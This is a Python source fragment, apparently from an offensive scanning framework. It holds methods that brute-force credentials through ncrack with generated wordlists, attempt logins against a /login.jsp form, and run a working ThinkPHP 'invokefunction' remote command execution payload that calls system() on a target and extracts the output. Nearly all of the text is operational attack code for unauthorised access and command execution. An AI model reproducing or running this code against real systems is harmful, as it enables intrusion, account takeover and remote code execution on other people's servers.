def send_encrypt(self, data):
url = self.target + "/"
url = url + "?" + random_choices() + "=" + random_choices()
headers = {"Cookie": '{}={}'.format(self._cookie_name, data)}
set_cookie = http_req(url,
headers=headers).headers.get('Set-Cookie', "")
return set_cookie
def _crack_user_pass(self):
self._gen_user_pass_file()
random_out_file = os.path.join(Conf.TEMP_DIR,
random_choices(6) + ".out.txt")
cmd = [
"ncrack", "-oN", "'{}'".format(random_out_file), "-f",
"-d{}".format(self.debug_lever), "-v",
"-g cl=1,CL={},at=1,cd={}ms,cr=5,to={}ms".format(
self.max_connection_limit, self.connection_delay,
self.timeout), "--pairwise",
"-U '{}'".format(self.gen_user_file),
"-P '{}'".format(self.gen_pass_file), self.target
]
exec_system(cmd)
lines = load_file(random_out_file)
if os.path.exists(random_out_file):
os.unlink(random_out_file)
os.unlink(self.gen_pass_file)
os.unlink(self.gen_user_file)
for line in lines:
if "credentials on" not in line:
continue
pattern = r"Discovered\s+credentials\s+on\s+([^\s]+)\s+'([^\']+)'\s+'([^\']+)'"
matches = re.findall(pattern, line)
if matches:
item = {"username": matches[0][1], "password": matches[0][2]}
return item
def _gen_user_pass_file(self):
user_list, pass_list = self.load_dict()
self.logger.info("load auth pair {}".format(len(user_list)))
random_str = random_choices(6)
random_user_file = os.path.join(Conf.TEMP_DIR,
random_str + ".user.txt")
random_pass_file = os.path.join(Conf.TEMP_DIR,
random_str + ".pass.txt")
append_file(random_user_file, user_list)
append_file(random_pass_file, pass_list)
self.gen_user_file = random_user_file
self.gen_pass_file = random_pass_file
self.debug_lever = 0
if Conf.LOGGER_LEVEL <= logging.DEBUG:
self.debug_lever = 7
self.max_connection_limit = 15
self.connection_delay = 100
self.timeout = 10 * 60 * 1000
for scheme in self.delay_scheme:
if scheme in self.scheme:
self.connection_delay = 1500
self.timeout = 20 * 60 * 1000
continue
def login(self, target, user, passwd):
# 15分钟内,只能尝试10次
url = target + "/login.jsp"
csrf = random_choices(10)
location_url = random_choices(6) + ".jsp"
headers = {"Cookie": "csrf={}".format(csrf)}
data = {
"url": "/{}".format(location_url),
"login": "******",
"csrf": csrf,
"username": user,
"password": passwd
}
conn = http_req(url, "post", headers=headers, data=data)
location = conn.headers.get("Location", "")
if location_url not in location:
return False
if conn.status_code == 301 or conn.status_code == 302:
return True
def exploit_cmd(self, target, cmd):
random_str = random_choices(4)
payload = "?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={cmd}"
tpl = "echo {}&&{}&&echo {}".format(random_str, cmd, random_str)
paths = ["/", "/public/"]
self.logger.info("verify {}".format(target))
reg = r"{}\s([\s\S]+?)\s{}".format(random_str, random_str)
for path in paths:
url = target + path + payload.format(cmd=urllib.parse.quote(tpl))
conn = http_req(url)
if random_str.encode() in conn.content:
results = re.findall(reg.encode(), conn.content)
if results:
self.logger.success("exploit success, result:")
print(results[0].decode())
return True